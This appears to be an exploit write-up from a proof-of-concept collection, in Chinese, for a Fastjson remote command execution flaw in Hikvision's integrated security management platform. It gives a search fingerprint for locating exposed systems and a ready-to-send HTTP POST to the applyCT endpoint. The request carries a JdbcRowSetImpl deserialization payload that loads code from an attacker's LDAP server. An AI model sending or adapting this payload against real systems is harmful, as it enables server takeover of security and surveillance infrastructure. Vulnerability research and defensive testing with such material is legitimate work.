Awesome-POC/网络设备漏洞/HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞.md
2024-11-06 14:10:36 +08:00

34 lines
824 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Hikvision 综合安防管理平台 applyCT Fastjson远程命令执行漏洞
## 漏洞描述
Hikvision 综合安防管理平台 applyCT 存在低版本Fastjson远程命令执行漏洞攻击者通过漏洞可以执行任意命令获取服务器权限
## 漏洞影响
```
Hikvision 综合安防管理平台
```
## 网络测绘
```
app="Hikvision-综合安防管理平台"
```
## 漏洞复现
登录页面
![image-20220824134144287](images/202208241341481.png)
验证POC
```
POST /bic/ssoService/v1/applyCT
Content-Type: application/json
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx.xxx.xxx.xxx/Basic/TomcatEcho","autoCommit":true},"hfe4zyyzldp":"="}
```
![image-20220824134503675](images/202208241345726.png)